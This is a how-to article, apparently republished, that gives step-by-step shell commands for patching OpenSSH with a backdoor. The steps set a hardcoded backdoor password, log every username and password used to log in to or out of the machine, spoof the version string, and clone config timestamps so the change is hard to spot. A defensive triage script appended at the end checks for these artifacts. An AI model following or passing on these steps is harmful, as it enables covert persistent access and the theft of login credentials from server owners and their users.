
OpenSSH backdoor to get root password

2025-04-09 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

1. View sshd system version

[root@huangzp2 src]# ssh -V

OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

2. Unpack the archives; the "patch" archive is the patch package

tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

tar -zxvf openssh-5.9p1.tar.gz

3. Apply the patch; back up the configuration files first

mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old

mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/

cd openssh-5.9p1

patch < sshbd5.9p1.diff # patching means replacing or modifying the original files

patching file auth.c # authentication

patching file auth-pam.c # authentication

patching file auth-passwd.c # authentication

patching file canohost.c

patching file includes.h

patching file log.c

patching file servconf.c # the sshd server side

patching file sshconnect2.c # sshd connections

patching file sshlogin.c # login; records the root password

patching file version.h # version

4. Modify the backdoor password and the directory of the files that record the root password

vim includes.h

#define ILOG "/usr/share/ifile" # records the usernames and passwords used to log in to this machine

#define OLOG "/usr/share/ofile" # records the usernames and passwords used to log in to other machines from this machine

#define SECRETPW "12345678" # backdoor password

5. Edit version.h (vim version.h) and set the version number to match the original.

Original: OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

6. Compile and install

Dependencies: yum install -y openssl openssl-devel pam-devel zlib zlib-devel gcc

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

make -j 4; make install

--prefix=/usr # installation directory

--sysconfdir=/etc/ssh # directory for the sshd configuration files

--with-pam # PAM authentication

--with-kerberos5 # Kerberos authentication

7. Set the timestamps of the new configuration files to those of the old ones

Description: make the modification time of ssh_config and sshd_config match that of ssh_config.old and sshd_config.old

touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config

touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config

8. Restart the sshd service

service sshd restart

9. Verify and view

After a login, check the log files and the password will have been recorded; if the password is changed, it is recorded again at the next login.

1) Usernames and passwords used to log in to this machine are recorded

2) Usernames and passwords used to log in to other machines from this machine are recorded

3) Login with the backdoor password works

10. Configure automatic mail delivery

(Omitted.)

Reference: http://www.cnblogs.com/croso/p/5280783.html
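For incident responders, the artifacts this procedure leaves on disk (the default ILOG/OLOG files, the .old configuration backups whose modification times were cloned with touch -r, and the log paths compiled into the binaries) can be checked with a short script. This is an added example, not part of the original article; the function name triage is hypothetical, and the binary locations /usr/sbin/sshd and /usr/bin/ssh are assumed from the --prefix=/usr setting in step 6.

```python
import os

# Defaults from the article's includes.h and its backup/touch steps. An
# operator can rename all of them, so an empty result proves nothing.
LOG_PATHS = ("usr/share/ifile", "usr/share/ofile")
CONFIGS = ("etc/ssh/ssh_config", "etc/ssh/sshd_config")
BINARIES = ("usr/sbin/sshd", "usr/bin/ssh")  # assumed from --prefix=/usr


def triage(root="/"):
    """Return sorted (indicator, path) findings for a live or mounted root."""
    findings = set()
    for rel in LOG_PATHS:
        path = os.path.join(root, rel)
        if os.path.isfile(path):
            findings.add(("credential-log", path))
    for rel in CONFIGS:
        cfg = os.path.join(root, rel)
        old = cfg + ".old"
        if not (os.path.isfile(cfg) and os.path.isfile(old)):
            continue
        findings.add(("config-backup", old))
        # touch -r copies the old file's mtime onto the new file exactly.
        if os.stat(cfg).st_mtime_ns == os.stat(old).st_mtime_ns:
            findings.add(("cloned-mtime", cfg))
    markers = [("/" + rel).encode() for rel in LOG_PATHS]
    for rel in BINARIES:
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            blob = fh.read()
        # The ILOG/OLOG macros end up as string literals in the binary.
        if any(m in blob for m in markers):
            findings.add(("log-path-in-binary", path))
    return sorted(findings)


if __name__ == "__main__":
    for indicator, path in triage("/"):
        print(f"{indicator}\t{path}")
```

On the RPM-based system the article uses, `rpm -V openssh-server openssh-clients` additionally reports installed files whose digest no longer matches the package database.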
